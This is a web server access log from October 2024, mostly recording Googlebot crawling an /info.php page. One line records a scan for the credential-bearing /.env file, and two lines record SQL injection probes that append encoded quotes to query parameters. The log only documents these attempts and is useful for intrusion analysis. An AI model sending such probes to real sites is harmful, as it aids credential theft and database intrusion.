143.198.55.238 - - [02/Oct/2024:00:15:46 +0200] "GET /.env HTTP/1.1" 404 - "-" "Mozilla/5.0 Keydrop"
143.198.55.238 - - [02/Oct/2024:00:15:46 +0200] "GET /" 400 474 "-" "-"
66.249.66.42 - - [02/Oct/2024:01:25:08 +0200] "GET /info.php?sifra=HDEM105m&skupina=86 HTTP/1.1" 200 19181 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.70 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.66.43 - - [02/Oct/2024:02:36:44 +0200] "GET /info.php?sifra=28515&skupina=82 HTTP/1.1" 200 19129 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.70 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.66.42 - - [02/Oct/2024:03:54:12 +0200] "GET /info.php?sifra=6202&skupina=54 HTTP/1.1" 200 17351 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.70 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
4.237.68.225 - - [02/Oct/2024:05:23:45 +0200] "GET /info.php?sifra=HDEM135%27&skupina=82 HTTP/1.1" 200 18635 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36"
4.237.68.225 - - [02/Oct/2024:05:23:45 +0200] "GET /info.php?sifra=HDEM135&skupina=82%27 HTTP/1.1" 200 17740 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36"
66.249.66.42 - - [02/Oct/2024:05:28:54 +0200] "GET /info.php?sifra=HDEM100HW&skupina=82 HTTP/1.1" 200 20084 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.70 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
